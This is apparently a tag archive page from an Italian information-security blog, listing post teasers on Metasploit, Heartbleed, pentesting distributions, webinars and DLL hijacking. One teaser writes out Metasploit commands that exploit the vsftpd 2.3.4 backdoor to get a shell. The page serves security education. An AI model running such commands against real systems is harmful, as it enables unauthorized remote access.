Taggato: Metasploit

Heartbleed 0

Metasploit & Heartbleed – Rendere ricorsivo l’exploit

Heartbleed è un’importante vulnerabilità del popolare software OpenSSL, CVE-2014-0160, il bug consente di leggere fino a 64KB di memoria dal server vulnerabile, con la possibilità di compromettere le chiavi segrete utilizzate per identificare i...

eLearnSecurity: da XSS ad amministratore di Active Directory 0

eLearnSecurity: da XSS ad amministratore di Active Directory

  Domani 28 ottobre 2014 alle ore 19:00 il ricercatore e istruttore Davide Girardi, conosciuto anche come GiRa, presenterà uno scenario d’attacco a una rete aziendale attraverso un Webinar offerto dalla eLearnSecurity. L’esploitation inizierà...

[eLearning] Post Exploitation! L’attacco è solo l’inizio… 0

[eLearning] Post Exploitation! L’attacco è solo l’inizio…

Continuano i webinar di eLearnSecuirty, il prossimo 17 Dicembre 2013 dalle 21:30 per circa un ora verrà presentato gratuitamente il corso dedicato alle fasi successiva al Exploitation. La fase di post exploitation è la...

Metasploitable – Una macchina virtuale vulnerabile 3

Metasploitable – Una macchina virtuale vulnerabile

Metasploitable è una macchina virtuale volutamente vulnerabile basata sul sistema operativo Linux. Questa distribuzione nasce con l’intento di effettuare delle simulazione di Penetration Testing a fini didattici, come si intuisce dal nome del software le...

[AGGIORNATO] Rilasciato BackBox 2! 1

[AGGIORNATO] Rilasciato BackBox 2!

La nuova BackBox 2 è stata appena rilasciata dal Team di sviluppatori guidato da Raffaele Forte, BackBox è una distribuzione di Penetration Testing basata su uBuntu e completamente Open Source. All’avvio di BackBox 2...

[VIDEO GUIDA] Armitage & Metasploit 4

[VIDEO GUIDA] Armitage & Metasploit

Il Team di Armitage (veste grafica per la famosa suite Metasploit) ha recentemente rilasciato sei video guide che illustrano passo a passo come sfruttare la potenzialità dei due software per testare la sicurezza di...

Exploit Search – Il Motore di Ricerca di Exploit 0

Exploit Search – Il Motore di Ricerca di Exploit

Exploit Sarch è un nuovo motore di ricerca dedicato agli Exploit, esso è infatti in grado di ricercare exploit su diversi portali di sicurezza informatica come NVD, OSVDB, SecurityFocus, Exploit-DB, Metasploit, Nessus, OpenVAS e...

[VIDEO] Dimostrazione della BackDoor di VSFTPD 0

[VIDEO] Dimostrazione della BackDoor di VSFTPD

Versione: vsftpd-2.3.4 del 30/06/2011 Dimostrazione Metasploit: use exploit/unix/ftp/vsftpd_234_backdoor set RHOST localhost set PAYLOAD cmd/unix/interact exploit id uname -a

Rilasciato Metasploit 3.5.0 0

Rilasciato Metasploit 3.5.0

Metasploit, è sicuramente lo strumento che tutti gli appassionati di sicurezza informatica devono conoscere  in quanto nasce con l’obbiettivo di individuare vulnerabilità informatiche. Oggi è stata rilasciata la versione 3.5.0 raggiungendo un database di...

Exploiting DLL Hijack, esempi reali! 1

Exploiting DLL Hijack, esempi reali!

Lo scorso Agosto vi avevo introdotto la nuova tecnica di DLL Hikacking in questo articolo, ma stanotte mi sono imbattuto in un interessante articolo di Bruno Filipe che dimostra come può essere sfruttata tale...